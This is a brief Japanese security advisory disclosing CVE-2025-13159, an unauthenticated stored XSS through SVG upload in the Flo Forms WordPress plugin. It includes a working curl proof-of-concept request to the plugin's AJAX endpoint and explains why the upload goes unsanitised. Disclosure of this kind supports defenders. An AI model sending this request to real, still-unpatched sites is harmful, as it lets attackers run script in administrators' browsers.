
Disclosure for CVE-2025-13159
CVE-2025-13159 の開示
このリポジトリは、Flo Forms – Easy Drag & Drop Form Builder <= 1.0.43、flothemesplugins が開発した WordPress プラグインで発見された脆弱性を開示します。
| CVE ID | タイプ | コンポーネント | 影響 |
|---|---|---|---|
| CVE-2025-13159 | 未認証のStored Cross-Site Scripting(SVGアップロード経由) | public/class-flo-forms-public.php | 未認証の攻撃者がJSを実行可能 |
curl -k -X POST "https://localhost:8080/wp-admin/admin-ajax.php" \
-F 'action=flo_form_submit' \
-F 'flo_fid=<your fid>' \
-F 'flo-form-model={}' \
-F 'flo-form-schema={"groups":[]}' \
-F '[email protected];type=image/svg+xml'
※オブジェクト内の fid が存在しない場合、失敗します。
このプラグインは、WordPressの許可されたMIMEタイプに image/svg+xml を追加し、ファイル添付を受け付ける未認証のAJAXアクション(flo_form_submit)を公開し、SVGのサニタイズや権限チェックを行わずに media_handle_upload() に渡します。アップロードされたSVGは image/svg+xml として提供され、管理UIからリンクされます。管理者が添付ファイルを(直接、または / 経由で)開くと、ブラウザがSVGドキュメントを解釈し、埋め込まれたスクリプトを実行するため、Stored XSSが発生します。
一ヵ月経過したが、まだパッチは公開されておらず、ダウンロード自体停止されている。 今回はPoCの再現がなかなか上手くいかず、1時間以上詰まったが結果的にXSS.svgの前にアットマーク(@)を付け忘れていたことが判明。
名前: MooseLove
役割: 独立したセキュリティ研究者 / バグハンター
連絡先: リクエストに応じて提供
このアドバイザリは、一般のセキュリティ啓発のために提供されています。帰属表示付きでの共有は自由です。